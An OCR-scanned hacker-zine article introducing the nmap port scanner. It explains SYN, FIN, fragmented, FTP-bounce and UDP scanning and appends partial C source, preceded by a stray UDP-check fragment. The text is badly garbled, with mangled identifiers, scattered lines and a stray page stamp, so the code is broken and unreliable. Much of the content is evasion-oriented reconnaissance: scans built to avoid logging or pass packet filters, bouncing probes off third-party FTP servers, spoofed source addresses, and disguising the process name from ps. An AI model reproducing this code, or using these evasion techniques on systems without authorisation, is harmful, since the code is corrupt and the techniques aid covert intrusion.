<netinet/in.h> 
<arpa/inet.h> 
<sys/types.h> 
<sys/socket.h> 
<sys/param.h> 
<sys/time.h> 
<sys/errno.h> 


extern int h_errno; 


arp 
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struct sockaddr_in *saddr = NULL; 


int 
check_udp_port (char *hostname, 


{ 


u_short port) 


Tit vSy 15. -SE; 

struct hostent *he; 

fd_set rset; 

struct timeval tv; 

if (!saddr) 

{ 
saddr = malloc(sizeof (struct sockaddr_in)); 
if(!saddr) return -1; 


saddr->sin_family = AF_INET; 
saddr->sin_addr.s_addr = 


{ 
sethostent (1); 
he = 
if ('he) 
{ 


inet_addr (hostname) ; 
if (saddr->sin_addr.s_addr == INADDR_NONE) 


gethostbyname (hostname) ; 


herror ("gethostbyname") ; 


exit (1); 
} 


if (he->h_length <= sizeof (saddr->sin_addr.s_addr) ) 


bcopy (he->h_addr, 
else 
bcopy (he->h_addr, 
n_addr.s_addr)); 
endhostent (); 
} 
} 
saddr->sin_port = htons (port); 
s = socket (AF_INET, SOCK_DGRAM, 
if(s < 0) 
{ 


0); 
perror ("socket"); 
return -1; 


connect (s, 
Lf(i < 0) 


(struct sockaddr *)saddr, 


perror ("connect") ; 
return —-1; 

} 

for(i=O;i < 3;i++) 

{ 
write(s, 1); 
FD_ZERO (&rset) ; 
FD_SET(s, &rset); 
tv.tv_sec = 5; 
tv.tv_usec = 0; 
sr = select (stl, 
if(sr != 1) 

continue; 

if(read(s, &Sr, sizeof(sr) ) 


wee 
, 


&rset, NULL, NULL, 


< 1) 


close(s); 
return 0; 


close(s); 
return 1; 


&saddr->sin_addr.s_addr, 


&saddr->sin_addr.s_addr, 


sizeof (struct 


he->h_length) ; 


sizeof (saddr->si 


sockaddr_in)); 


&tv); 
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close(s); 
return 1; 


----[ EOF 
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[ The Art of Port Scanning 


yee Reece [ Fyodor <fyodor@dhp.com> 


[ Abstract ] 


This paper details many of the techniques used to determine what ports (or 
Similar protocol abstraction) of a host are listening for connections. These 
ports represent potential communication channels. Mapping their existenc 
facilitates the exchange of information with the host, and thus it is quite 
useful for anyone wishing to explore their networked environment, including 
hackers. Despite what you have heard from the media, the Internet is NOT 

all about TCP port 80. Anyone who relies exclusively on the WWW for 
information gathering is likely to gain the same level of proficiency as your 
average AOLer, who does the same. This paper is also meant to serve as an 
introduction to and ancillary documentation for a coding project I have been 
working on. It is a full featured, robust port scanner which (I hope) solves 
some of the problems I have encountered when dealing with other scanners and 
when working to scan massive networks. The tool, nmap, supports the following: 


— vanilla TCP connect() scanning, 
- TCP SYN (half open) scanning, 
-— TCP FIN (stealth) scanning, 
- TCP ftp proxy (bounce attack) scanning 
—- SYN/FIN scanning using IP fragments (bypasses packet filters), 
— UDP recvfrom() scanning, 
— UDP raw ICMP port unreachable scanning, 
- ICMP scanning (ping-sweep), and 
reverse-ident scanning. 


The freely distributable source code is appended to this paper. 


[ Introduction ] 


Scanning, as a method for discovering exploitable communication channels, has 
been around for ages. The idea is to probe as many listeners as possible, and 
keep track of the ones that are receptive or useful to your particular need. 
Much of the field of advertising is based on this paradigm, and the "to current 
resident" brute force style of bulk mail is an almost perfect parallel to what 
we will discuss. Just stick a message in every mailbox and wait for the 
responses to trickle back. 


Scanning entered the h/p world along with the phone systems. Here we have this 
tremendous global telecommunications network, all reachable through codes on 
our telephone. Millions of numbers are reachable locally, yet we may only 

be interested in 0.5% of these numbers, perhaps those that answer with a 
carrier. 


The logical solution to finding those numbers that interest us is to try them 
all. Thus the field of "wardialing" arose. Excellent programs like Toneloc 
were developed to facilitate the probing of entire exchanges and more. The 
basic idea is simple. If you dial a number and your modem gives you a CONNECT, 
you record it. Otherwise the computer hangs up and tirelessly dials the next 
one. 


While wardialing is still useful, we are now finding that many of the computers 
we wish to communicate with are connected through networks such as the Internet 
rather than analog phone dialups. Scanning these machines involves the same 
brute force technique. We send a blizzard of packets for various protocols, 
and we deduce which services are listening from the responses we receive (or 
don’t receive). 
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[ Techniques ] 


Over time, a number of techniques have been developed for surveying the 
protocols and ports on which a target machine is listening. They all offer 
different benefits and problems. Here is a line up of the most common: 


— TCP connect () scanning This is the most basic form of TCP scanning. The 
connect () system call provided by your operating system is used to open a 
connection to every interesting port on the machine. If the port is listening, 
connect () will succeed, otherwise the port isn’t reachable. One strong 
advantage to this technique is that you don’t need any special privileges. Any 
user on most UNIX boxes is free to use this call. Another advantage is speed. 
While making a separate connect() call for every targeted port in a linear 
fashion would take ages over a slow connection, you can hasten the scan by 
using many sockets in parallel. Using non-blocking I/O allows you to set a low 
time-out period and watch all the sockets at once. This is the fastest 
scanning method supported by nmap, and is available with the -t (TCP) option. 
The big downside is that this sort of scan is easily detectable and filterable. 
The target hosts logs will show a bunch of connection and error messages for 
the services which take the connection and then have it immediately shutdown. 


- TCP SYN scanning : This technique is often referred to as "half-open" 
scanning, because you don’t open a full TCP connection. You send a SYN packet, 
as if you are going to open a real connection and wait for a response. A 
SYN|ACK indicates the port is listening. A RST is indicative of a non- 
listener. If a SYN|ACK is received, you immediately send a RST to tear down 
the connection (actually the kernel does this for us). The primary advantage 
to this scanning technique is that fewer sites will log it. Unfortunately you 
need root privileges to build these custom SYN packets. SYN scanning is the -s 
option of nmap. 


—- TCP FIN scanning : There are times when even SYN scanning isn’t clandestine 
enough. Some firewalls and packet filters watch for SYNs to an unallowed port, 
and programs like synlogger and Courtney are available to detect these scans. 
FIN packets, on the other hand, may be able to pass through unmolested. This 
scanning technique was featured in detail by Uriel Maimon in Phrack 49, article 
15. The idea is that closed ports tend to reply to your FIN packet with the 
proper RST. Open ports, on the other hand, tend to ignore the packet in 


question. This is a bug in TCP implementations and so it isn’t 100% reliable 
(some systems, notably MicroSoft boxes, seem to be immune). It works well on 


most other systems I’ve tried. FIN scanning is the -U (Uriel) option of nmap. 


— Fragmentation scanning : This is not a new scanning method in and of itself, 
but a modification of other techniques. Instead of just sending the probe 
packet, you break it into a couple of small IP fragments. You are splitting 
up the TCP header over several packets to make it harder for packet filters 
and so forth to detect what you are doing. Be careful with this! Some 
programs have trouble handling these tiny packets. My favorite sniffer 
segmentation faulted immediately upon receiving the first 36-byte fragment. 
After that comes a 24 byte one! While this method won’t get by packet filters 
and firewalls that queue all IP fragments (like the CONFIG_IP_ALWAYS_DEFRAG 
option in Linux), a lot of networks can’t afford the performance hit this 
causes. This feature is rather unique to scanners (at least I haven’t seen 
any others that do this). Thanks to daemon9 for suggesting it. The -f 
instructs the specified SYN or FIN scan to use tiny fragmented packets. 


- TCP reverse ident scanning : As noted by Dave Goldsmith in a 1996 Bugtraq 
post, the ident protocol (rfcl413) allows for the disclosure of the username of 
the owner of any process connected via TCP, even if that process didn’t 
initiate the connection. So you can, for example, connect to the http port 

and then use identd to find out whether the server is running as root. This 
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can only be done with a full TCP connection to the target port (i.e. the -t 
option). nmap’s -i option queries identd for the owner of all listen()ing 
ports. 


- FTP bounce attack : An interesting "feature" of the ftp protocol (RFC 959) is 
support for "proxy" ftp connections. In other words, I should be able to 
connect from evil.com to the FTP server-PI (protocol interpreter) of target.com 
to establish the control communication connection. Then I should be able to 
request that the server-PI initiate an active server-DTP (data transfer 
process) to send a file ANYWHERE on the internet! Presumably to a User-DTP, 
although the RFC specifically states that asking one server to send a file to 
another is OK. Now this may have worked well in 1985 when the RFC was just 
written. But nowadays, we can’t have people hijacking ftp servers and 
requesting that data be spit out to arbitrary points on the internet. As 
*Hobbit* wrote back in 1995, this protocol flaw "can be used to post virtually 
untraceable mail and news, hammer on servers at various sites, fill up disks, 
try to hop firewalls, and generally be annoying and hard to track down at the 


same time." What we will exploit this for is to (Surprise, surprise) scan TCP 
ports from a "proxy" ftp server. Thus you could connect to an ftp server 
behind a firewall, and then scan ports that are more likely to be blocked (139 
is a good one). If the ftp server allows reading from and writing to a 


directory (such as /incoming), you can send arbitrary data to ports that you do 
find open. 


For port scanning, our technique is to use the PORT command to declare that 
our passive "User-DTP" is listening on the target box at a certain port number. 
Then we try to LIST the current directory, and the result is sent over the 


Server-DTP channel. If our target host is listening on the specified port, the 
transfer will be successful (generating a 150 and a 226 response). Otherwise 
we will get "425 Can’t build data connection: Connection refused." Then we 
issue another PORT command to try the next port on the target host. The 
advantages to this approach are obvious (harder to trace, potential to bypass 
firewalls). The main disadvantages are that it is slow, and that some FTP 
servers have finally got a clue and disabled the proxy "feature". For what it 


is worth, here is a list of banners from sites where it does/doesn’t work: 


*Bounce attacks worked:* 


220 XxXxXxXxXxx.com FTP server (Version wu-2.4(3) Wed Dec 14 ...) ready. 

220 xxXxX.XXX.xxx.edu FTP server ready. 

220 xx.Telcom.xxxx.EDU FTP server (Version wu-2.4(3) Tue Jun 11...) ready. 
220 lem FTP server (SunOS 4.1) ready. 

220 xxx.xxx.es FTP server (Version wu-2.4(11) Sat Apr 27 ...) ready. 


220 elios FTP server (SunOS 4.1) ready 
*Bounce attack failed:* 


220 wcarchive.cdrom.com FTP server (Version DG-2.0.39 Sun May 4 ...) ready. 
220 XXX.XX.XXxXxXxX.EDU Version wu-2.4.2-academ[BETA-12](1) Fri Feb 7 

220 ftp Microsoft FTP Service (Version 3.0). 

220 xxx FTP server (Version wu-2.4.2-academ[BETA-11](1) Tue Sep 3 ...) ready. 
220 xxx.unc.edu FTP server (Version wu-2.4.2-academ[BETA-13] (6) ...) ready. 


The ’x’s are partly there to protect those guilty of running a flawed server, 
but mostly just to make the lines fit in 80 columns. Same thing with the 
ellipse points. The bounce attack is available with the -b <proxy_server> 
option of nmap. proxy_server can be specified in standard URL format, 
username: password@server:port , with everything but server being optional. 


— UDP ICMP port unreachable scanning : This scanning method varies from the 
above in that we are using the UDP protocol instead of TCP. While this 
protocol is simpler, scanning it is actually significantly more difficult. 

This is because open ports don’t have to send an acknowledgement in response to 
our probe, and closed ports aren’t even required to send an error packet. 
Fortunately, most hosts do send an ICMP_PORT_UNREACH error when you send a 
packet to a closed UDP port. Thus you can find out if a port is NOT open, and 
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by exclusion determine which ports which are. Neither UDP packets, nor the 
ICMP errors are guaranteed to arrive, so UDP scanners of this sort must also 


implement retransmission of packets that appear to be lost (or you will get a 
bunch of false positives). Also, this scanning technique is slow because of 
compensation for machines that took RFC 1812 section 4.3.2.8 to heart and limit 
ICMP error message rate. For example, the Linux kernel (in net/ipv4/icmp.h) 


limits destination unreachable message generation to 80 per 4 seconds, with a 
1/4 second penalty if that is exceeded. At some point I will add a better 
algorithm to nmap for detecting this. Also, you will need to be root for 
access to the raw ICMP socket necessary for reading the port unreachable. The 
-u (UDP) option of nmap implements this scanning method for root users. 


Some people think UDP scanning is lame and pointless. I usually remind them of 
the recent Solaris repbind hole. Rpcbind can be found hiding on an 
undocumented UDP port somewhere above 32770. So it doesn’t matter that 111 is 


blocked by the firewall. But can you find which of the more than 30,000 high 
ports it is listening on? With a UDP scanner you can! 


- UDP recvfrom() and write() scanning : While non-root users can’t read 

port unreachable errors directly, Linux is cool enough to inform the user 
indirectly when they have been received. For example a second write () 

all to a closed port will usually fail. A lot of scanners such as netcat 
nd Pluvius’ pscan.c does this. I have also noticed that recvfrom() on 
on-blocking UDP sockets usually return EAGAIN ("Try Again", errno 13) if 

he ICMP error hasn’t been received, and ECONNREFUSED ("Connection refused", 
rrno 111) if it has. This is the technique used for determining open ports 
hen non-root users use -u (UDP). Root users can also use the -l (lamer 

DP scan) options to force this, but it is a really dumb idea. 


Geodtpanaoada 


—- ICMP echo scanning : This isn’t really port scanning, since ICMP doesn’t have 
a port abstraction. But it is sometimes useful to determine what hosts ina 
network are up by pinging them all. the -P option does this. Also you might 
want to adjust the PING_TIMEOUT #define if you are scanning a large 

network. nmap supports a host/bitmask notation to make this sort of thing 
easier. For example /nmap -P cert.org/24 152.148.0.0/16’ would scan CERT’s 
class C network and whatever class B entity 152.148.* represents. Host/26 is 
useful for 6-bit subnets within an organization. 


[ Features ] 


Prior to writing nmap, I spent a lot of time with other scanners exploring the 
Internet and various private networks (note the avoidance of the "intranet" 
buzzword). I have used many of the top scanners available today, including 
strobe by Julian Assange, netcat by *Hobbit*, stcp by Uriel Maimon, pscan by 
Pluvius, ident-scan by Dave Goldsmith, and the SATAN tcp/udp scanners by 
Wietse Venema. These are all excellent scanners! In fact, I ended up hacking 
most of them to support the best features of the others. Finally I decided 

to write a whole new scanner, rather than rely on hacked versions of a dozen 
different scanners in my /usr/local/sbin. While I wrote all the code, nmap 


uses a lot of good ideas from its predecessors. I also incorporated some new 
stuff like fragmentation scanning and options that were on my "wish list" for 
other scanners. Here are some of the (IMHO) useful features of nmap: 

— dynamic delay time calculations: Some scanners require that you supply a 
delay time between sending packets. Well how should I know what to use? 
Sure, I can ping them, but that is a pain, and plus the response time of many 
hosts changes dramatically when they are being flooded with requests. nmap 


tries to determine the best delay time for you. It also tries to keep track 
of packet retransmissions, etc. so that it can modify this delay time during 
the course of the scan. For root users, the primary technique for finding an 
initial delay is to time the internal "ping" function. For non-root users, it 
times an attempted connect() to a closed port on the target. It can also pick 
a reasonable default value. Again, people who want to specify a delay 
themselves can do so with -w (wait), but you shouldn’t have to. 
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—- retransmission: Some scanners just send out all the query packets, and 
collect the responses. But this can lead to false positives or negatives in 
the case where packets are dropped. This is especially important for 
"negative" style scans like UDP and FIN, where what you are looking for is a 
port that does NOT respond. In most cases, nmap implements a configurable 
number of retransmissions for ports that don’t respond. 


—- parallel port scanning: Some scanners simply scan ports linearly, one at a 
time, until they do all 65535. This actually works for TCP on a very fast 
local network, but the speed of this is not at all acceptable on a wide area 
network like the Internet. nmap uses non-blocking i/o and parallel scanning 
in all TCP and UDP modes. The number of scans in parallel is configurable 
with the -M (Max sockets) option. On a very fast network you will actually 
decrease performance if you do more than 18 or so. On slow networks, high 
values increase performance dramatically. 


— Flexible port specification: I don’t always want to just scan all 65535 
ports. Also, the scanners which only allow you to scan ports 1 - N sometimes 
fall short of my need. The -p option allows you to specify an arbitrary 


number of ports and ranges for scanning. For example, ’-p 21-25,80,113, 
60000-’ does what you would expect (a trailing hyphen means up to 65536, a 
leading hyphen means 1 through). You can also use the -F (fast) option, which 
scans all the ports registered in your /etc/services (a la strobe). 


Flexible target specification: I often want to scan more then one host, 
and I certainly don’t want to list every single host on a large network to 
scan. Everything that isn’t an option (or option argument) in nmap is 


treated as a target host. As mentioned before, you can optionally append 
/mask to a hostname or IP address in order to scan all hosts with the same 
initial <mask> bits of the 32 bit IP address. 


— detection of down hosts: Some scanners allow you to scan large networks, but 
they waste a huge amount of time scanning 65535 ports of a dead host! By 
default, nmap pings each host to make sure it is up before wasting time on it. 

It is also capable of bailing on hosts that seem down based on strange port 
scanning errors. It is also meant to be tolerant of people who accidentally scan 
network addresses, broadcast addresses, etc. 


-— detection of your IP address: For some reason, a lot of scanners ask you to 
type in your IP address as one of the parameters. Jeez, I don’t want to have 
to ’ifconfig’ and figure out my current address every time I scan. Of course, 
this is better then the scanners I’ve seen which require recompilation every 
time you change your address! nmap first tries to detect your address during 
the ping stage. It uses the address that th cho response is received on, as 
that is the interface it should almost always be routed through. If it can’t 
do this (like if you don’t have host pinging enabled), nmap tries to detect 
your primary interface and uses that address. You can also use -S to specify 
it directly, but you shouldn’t have to (unless you want to make it look like 
someone ELSE is SYN or FIN scanning a host. 


Some other, more minor options: 


-v (verbose): This is highly recommended for interactive use. Among other 
useful messages, you will see ports come up as they are found, rather than 
having to wait for the sorted summary list. 


-r (randomize): This will randomize the order in which the target host’s 
ports are scanned. 


-q (quash argv): This changes argv[0] to FAKE_ARGV ("pine" by default). 
It also eliminates all other arguments, so you won’t look too suspicious in 
'w’ or ‘ps’ listings. 


-h for an options summary. 


Also look for http://www.dhp.com/~fyodor/nmap/, which is the web site I plan to 
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put future versions and more information on. In fact, you would be well 
advised to check there right now. 


[ Greets ] 


Of course this paper would not be complete without a shout out to all the 
people who made it possible. 


Congratulations to the people at Phrack for getting this thing going again! 
Greets to the whole dc-stuff crew. 

Greets to the STUPH, Turntec, LOpht, TACD, the Guild, cDc, and all the other 
groups who help keep the scene aliv 

Shout out to _eci for disclosing the coolest Windows bug in recent history. 
Thanks to the Data Haven Project (dhp.com) admins for providing such great 
service for $10/month. 


* And a special shout out goes to all my friends. You know who 
you are and some of you (wisely) stay out of the spotlight, so I’1ll keep you 
anonymous ... except of course for Ken and Jay, and Avenger, Grog, Cash 


Monies, Ethernet Kid, Zos, JulICe, Mother Prednisone, and Karen. 


And finally, we get to 


[ The code ] 


This should compile fine on any Linux box with ’gcc -O6 -o nmap nmap.c -lm’. 
It is distrubuted under the terms of the GNU GENERAL PUBLIC LICENSE. If you 
have problems or comments, feel free to mail me (fyodor@dhp.com). 


<++> nmap/Makefile 
# A trivial makefile for Network Mapper 
nmap: nmap.c nmap.h 

gcc —-Wall -O6 -o nmap nmap.c -lm 


<=> 


<++> nmap/nmap.h 
ifndef NMAP_H 
define NMAP_H 


[RK KKK KKK KK KK OK KK KKK TNCLUDES ® & & KK KK RK KK OK OK KK / 


nclude <stdio.h> 

nclude <stdlib.h> 

nclude <string.h> 

nclude <sys/types.h> 
nclude <rpc/types.h> 
nclude <sys/socket.h> 
nclude <sys/socket.h> 
nclude <sys/stat.h> 
nclude <netinet/in.h> 
nclude <unistd.h> 

nclude <netdb.h> 

nclude <time.h> 

nclude <fcntl.h> 

nclude <signal.h> 

nclude <signal.h> 

nclude <linux/ip.h> /*<netinet/ip.h>*/ 
nclude <linux/icmp.h> /*<netinet/ip_icmp.h>*/ 
nclude <arpa/inet.h> 
nclude <math.h> 

nclude <time.h> 

nclude <sys/time.h> 
nclude <asm/byteorder.h> 
nclude <netinet/ip_tcp.h> 


< 
< 
< 
< 


Be pe pe pe pe pe pe pe pe pe pe ee ee Ee 


[RR KK RK KKK KKK KK KKK KKK KK KD EE LINES % ® & % KK KR RK OK OK OK KK / 
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/* #define to zero if you don’t want to ignore hosts of the form 


XXX. 
define 


define 


XxXxX.xXxx. {0,255} (usually network and broadcast addresses) */ 
IGNORE_ZERO_AND_255_HOSTS 1 


DEBUGGING 0 


/* Default number of ports in paralell. Doesn’t always involve actual 


sock 
define 
/* If xr 
coun 
define 
/* Thi 


define 
/* How 
the po 
define 
/ *How 
define 
define 
/* How 
define 
define 
define 


define 
define 
define 
define 


[RKKKKK 


typedef 
unsig 
unsig 
char 
struc 

} port; 


struct 
char 
char 
char 
struc 
unsig 
int s 


}; 
typedef 


[RKKKKK 


/* prin 
void pr 


/* our 
portlis 


portlis 
portlis 


portlis 


portlis 


he target */ 


ets. Can also adjust with the -M command line option. */ 
MAX_SOCKETS 36 
eads of a UDP port keep returning EAGAIN (errno 13), do we want to 
t the port as valid? */ 
RISKY_UDP_SCAN 0 

s ideally should be a port that isn’t in use for any protocol on our machine or on t 


MAGIC_PORT 49724 
many udp sends without a ICMP port unreachable error does it take before we consider 
rt open? */ 
UDP_MAX_PORT_RETRIES 4 
many seconds before we give up on a host being alive? */ 
PING_TIMEOUT 2 

FAKE_ARGV "pine" /* What ps and w should show if you use -q */ 

do we want to log into ftp sites for */ 

FTPUSER "anonymous" 

FTPPASS "-wwwuser@" 
FTP_RETRIES 2 /* How many times should we relogin if we lose control 
connection? */ 


UC (b) (((int)b) &0xff) 

MORE_FRAGMENTS 8192 /*NOT a user serviceable parameter*/ 
fatal(x) { fprintf(stderr, "s\n", x); exit(-1); } 
error(x) fprintf(stderr, "%s\n", x); 


KOK KKK KKK KK KK KK STRUCTURES * ® & % KK KK KK OK RK OK KK KK KK / 


struct port { 
ned short portno; 
ned char proto; 
*owner; 
t port *next; 


ftpinfo { 

user[64]; 

pass[256]; /* methinks you’re paranoid if you need this much space */ 
server_name [MAXHOSTNAMELEN + 1]; 

t in_addr server; 

ned short port; 

dad; /* socket descriptor */ 


port *portlist; 


KOK KKK KK KK KKK KKK DROTOTYPES * *® ® & KKK KK KK KK OK KK KK / 


t usage information */ 
intusage(char *name) ; 


scanning functions */ 

t tcp_scan(struct in_addr target, unsigned short *portarray, 
portlist *ports); 

t syn_scan(struct in_addr target, unsigned short *portarray, 
struct in_addr *source, int fragment, portlist *ports); 

t fin_scan(struct in_addr target, unsigned short *portarray, 
struct in_addr *source, int fragment, portlist *ports); 

t udp_scan(struct in_addr target, unsigned short *portarray, 
portlist *ports); 

t lamer_udp_scan(struct in_addr target, unsigned short *portarray, 

portlist *ports); 
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portlist bounce_scan(struct in_addr target, unsigned short *portarray, 
struct ftpinfo *ftp, portlist *ports); 


/* Scan helper functions */ 

unsigned long calculate_sleep(struct in_addr target); 

int check_ident_port (struct in_addr target); 

int getidentinfoz(struct in_addr target, int localport, int remoteport, 
char *owner); 

int parse_bounce(struct ftpinfo *ftp, char *url); 

int ftp_anon_connect (struct ftpinfo *ftp); 


/* port manipulators */ 

unsigned short *getpts(char *expr); /* someone stole the name getports()! */ 
u 

1 


nsigned short *getfastports(int tcpscan, int udpscan); 

int addport (portlist *ports, unsigned short portno, unsigned short protocol, 
char *owner); 

int deleteport (portlist *ports, unsigned short portno, unsigned short protocol); 
void printandfreeports(portlist ports); 

int shortfry(unsigned short *ports); 


/* socket manipulation functions */ 

void init_socket (int sd); 

int unblock_socket (int sd); 

int block_socket (int sd); 

int recvtime(int sd, char *buf, int len, int seconds); 


/* RAW packet building/dissasembling stuff */ 
int send_tcp_raw( int sd, struct in_addr *source, 
struct in_addr *victim, unsigned short sport, 
unsigned short dport, unsigned long seq, 
unsigned long ack, unsigned char flags, 
unsigned short window, char *data, 
unsigned short datalen); 
int isup(struct in_addr target); 
unsigned short in_cksum(unsigned short *ptr,int nbytes); 
int send_small_fragz(int sd, struct in_addr *source, struct in_addr *victim, 
int sport, int dport, int flags); 
int readtcppacket (char *packet, int readdata); 
int listen_icmp(int icmpsock, unsigned short outports[], 
unsigned short numtries[], int *num_out, 
struct in_addr target, portlist *ports); 


/* general helper functions */ 

void hdump (unsigned char *packet, int len); 
void *safe_malloc(int size); 

#endif /* NMAP_H */ 

<--> 


<++> nmap/nmap.c 


#include "nmap.h" 


/* global options */ 
short debugging = DEBUGGING; 

short verbose = 0; 

int number_of_ports = 0; /* How many ports do we scan per machine? */ 
int max_parallel_sockets = MAX_SOCKETS; 

extern char *optarg; 

extern int optind; 

short isr00t = 0; 
Ss 
o 
u 
u 
Ss 


hort identscan = 0; 
har current_name [MAXHOSTNAMELEN + 1]; 
nsigned long global_delay 


nsigned long global_rtt = 
truct in_addr ouraddr = { 


int main(int argc, char *argv[]) { 
int i, j, arg, argvlen; 
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short fastscan=0, tcpscan=0, udpscan=0, synscan=0, randomize=0; 
short fragscan = 0, finscan = 0, quashargv = 0, pingscan = 0, lamerscan = 0; 
short bouncescan = 0; 

short *ports = NULL, mask; 

struct ftpinfo ftp { FTPUSER, FTPPASS, "", { 0 }, 21, 0}; 
portlist openports = NULL; 

struct hostent *target = 0; 

unsigned long int lastip, currentip, longtmp; 

char *target_net, *p; 

struct in_addr current_in, *source=NULL; 

int hostup = 0; 

char *fakeargv[arge + 1]; 


/* argv faking silliness */ 
for(i=0; i < argc; i++) { 


fakeargv[i] = safe_malloc(strlen(argv[i]) + 1); 
strncpy(fakeargv[i], argv[i], strlen(argv[i]) + 1); 
} 
fakeargv[argc] = NULL; 
if (argc < 2 ) printusage(argv[0]); 


/* OK, lets parse these args! */ 


while((arg = getopt (argc, fakeargv, "b:dFfhilM:Pp:qrS:stUuw:v")) != EOF) { 
switch(arg) { 
case 'b’: 
bouncescantt+; 
if (parse_bounce(&ftp, optarg) < 0) { 
fprintf(stderr, "Your argument to -b is fucked up. Use the normal url style: user:pa 


ss@server:port or just use server and use default anon login\n Use -h for help\n"); 

} 
break; 

case 'd’: debuggingt+; break; 

case '’F’: fastscantt+; break; 

case '’f'’: fragscant+t; break; 

case 'h’: 

case ’?’: printusage(argv[0]); 

case ’i’: identscant+; break; 

case ’1’: lamerscant++; udpscant+t; break; 


case 'M’: max_parallel_sockets = atoi(optarg); break; 
case ’P’: pingscantt+; break; 
case 'p’: 
if (ports) 
fatal("Only 1 -p option allowed, seperate multiple ranges with commas."); 


ports = getpts(optarg); break; 
case '’r’: randomizet+; break; 
case ’s’: synscant+t+; break; 
case 'S’: 

if (source) 


fatal("You can only use the source option once!\n"); 
source = safe_malloc(sizeof (struct in_addr)); 
if (!inet_aton(optarg, source) ) 

fatal("You must give the source address in dotted deciman, currently.\n"); 
break; 


case ’t’: tcpscan+t+; break; 
case '’U’: finscant+t+; break; 
case ’u’: udpscant++; break; 
case ’q’: quashargvt+; break; 

case ’w’: global_delay = atoi(optarg); break; 
case 'v’: verbos ; 


} 


} 


/* Take care of user wierdness */ 

isr00t = ! (geteuid() |geteuid()); 

if (tcpscan && synscan) 
fatal("The -t and -s options can’t be used together.\ 
If you are trying to do TCP SYN scanning, just use -s.\ 
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For normal connect() style scanning, use -t"); 
if ((synscan || finscan || fragscan || pingscan) && !isr00t) 
fatal("Options specified require r0O0Ot privileges. You don’t have them!"); 


if ('!tcpscan && !udpscan && !synscan && !finscan && !bouncescan && !pingscan) { 
tcpscantt; 
if (verbose) error("No scantype specified, assuming vanilla tcp connect () \ 
scan. Use -P if you really don’t want to portscan."); 
if (fastscan && ports) 
fatal("You can use -F (fastscan) OR -p for explicit port specification. \ 
Not both! \n"); 
} 
/* If he wants to bounce of an ftp site, that site better damn well be reachable! */ 
if (bouncescan) { 
if (!inet_aton(ftp.server_name, &ftp.server)) { 
if ((target = gethostbyname (ftp.server_name) ) ) 
memcpy (&ftp.server, target->h_addr_list[0], 4); 
else { 
fprintf(stderr, "Failed to resolve ftp bounce proxy hostname/IP: %s\n", 
ftp.server_name) ; 
exit (1); 
} 
} else if (verbose) 
printf ("Resolved ftp bounce attack proxy to %s (%s).\n", 
target->h_name, inet_ntoa(ftp.server)); 
} 
printf("\nStarting nmap V 1.21 by Fyodor (fyodor@dhp.com, www.dhp.com/~ fyodor/nmap/\n") ; 
if (!verbose) 
error("Hint: The -v option notifies you of open ports as they are found.\n"); 
if (fastscan) 


ports = getfastports(synscan|tcpscan|fragscan|finscan|bouncescan, 
udpscan|lamerscan) ; 
if ('ports) ports = getpts("1-1024"); 


/* more fakeargv junk, BTW malloc’ing extra space in argv[0] doesn’t work */ 


i (quashargv) 
argvlen = strlen(argv[0]); 
if (argvlen < strlen (FAKE_ARGV) ) 
fatal("If you want me to fake your argv, you need to call the program with a longer nam 
e. Try the full pathname, or rename it fyodorssuperdedouperportscanner"); 
strncpy (argv[0], FAKE_ARGV, strlen (FAKE_ARGV) ); 
for(i = strlen(FAKE_ARGV); i < argvlen; i++) argv[0][i] = ’\0’; 
for(i=l; i < argc; i++) { 
argvlen = strlen(argv[i]); 
for(j=0; 3 <= argvlen; j++) 
argv[il[j] = ’\0’; 


} 
srand(time (NULL) ); 
while(optind < argc) { 


/* Time to parse the allowed mask */ 
target = NULL; 
target_net = strtok(strdup(fakeargv[optind]), "/"); 
mask = (p = strtok(NULL,""))? atoi(p) : 32; 
if (debugging) 
printf ("Target network is %s, scanmask is %d\n", target_net, mask); 


if (!inet_aton(target_net, &current_in)) { 
if ((target = gethostbyname (target_net) )) 
memcpy (&currentip, target->h_addr_list[0], 4); 
else { 
fprintf(stderr, "Failed to resolve given hostname/IP: %s\n", target_net) ; 


} else currentip = current_in.s_addr; 


longtmp = ntohl(currentip); 


11.txt Wed Apr 26 09:43:42 2017 11 
currentip = longtmp & (unsigned long) (0 - pow(2,32 - mask)); 
lastip = longtmp | (unsigned long) (pow(2,32 - mask) - 1); 


while (currentip <= lastip) { 
openports = NULL; 
longtmp = htonl(currentip); 


target = gethostbyaddr((char *) &longtmp, 4, AF_INET); 


current_in.s_addr = longtmp; 
if (target) 


strncpy(current_name, target->h_name, MAXHOSTNAMELEN) ; 


else current_name[0] = ’\0’; 
current_name [MAXHOSTNAMELEN + 1] = ’\0’; 
if (randomize) 


shortfry (ports); 
IGNORE_ZERO_AND_255_HOSTS 
(IGNORE_ZERO_AND_255_HOSTS 


#ifde 
zi 


&& (!(currentip % 256) || currentip % 256 == 255)) 


{ 


printf ("Skipping host %s because IGNORE_ZERO_AND_255_HOSTS is set in the source.\n" 


, inet_ntoa(current_in)); 
hostup = 0; 
} 


elsef{ 
#fendif 
if (isrOO0t) { 
if (!(hostup = isup(current_in))) { 
if (!pingscan) 
printf("Host %s (%S) appears to be down, skipping scan.\n", 
current_name, inet_ntoa(current_in)); 
else 
printf("Host %s (%S) appears to be down\n", 
current_name, inet_ntoa(current_in)); 
} else if (debugging || pingscan) 
printf("Host %s (%s) appears to be up ... good.\n", 
current_name, inet_ntoa(current_in)); 
} 
else hostup = 1; /* We don’t really check because the lamer isn’t root.*/ 


/* Time for some actual scanning! */ 
if (hostup) { 


if (tcpscan) tcp_scan(current_in, ports, &openports) ; 
if (synscan) syn_scan(current_in, ports, source, fragscan, &openports); 
if (finscan) fin_scan(current_in, ports, source, fragscan, &openports); 
if (bouncescan) { 

if (ftp.sd <= 0) ftp_anon_connect (&ftp) ; 

if (ftp.sd > 0) bounce_scan(current_in, ports, &ftp, &openports); 


} 
if (udpscan) { 
fF (!isr00t || lamerscan) 


else udp_scan(current_in, ports, 


} 


if (!openports && !pingscan) 
printf("No ports open for host %s 
inet_ntoa(current_jin)); 
if (openports) { 
printf("Open ports on %s (%s 
inet_ntoa(current_in) 
printandfreeports (openports) 
} 
} 


currentiptt; 


e\nitt, 


lamer_udp_scan(current_in, ports, &openports); 


&0penports); 


(%s)\n", current_name, 


current_name, 
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optindtt+; 
} 


return 0; 


} 


—_ inline int unblock_socket (int sd) { 

int options; 

/*Unblock our socket to prevent recvfrom from blocking forever 
on certain target ports. */ 

options = O_NONBLOCK | fcntl(sd, F_GETFL); 

fentl(sd, F_SETFL, options); 

return 1; 


} 


—_ inline int block_socket (int sd) {f{ 

int options; 

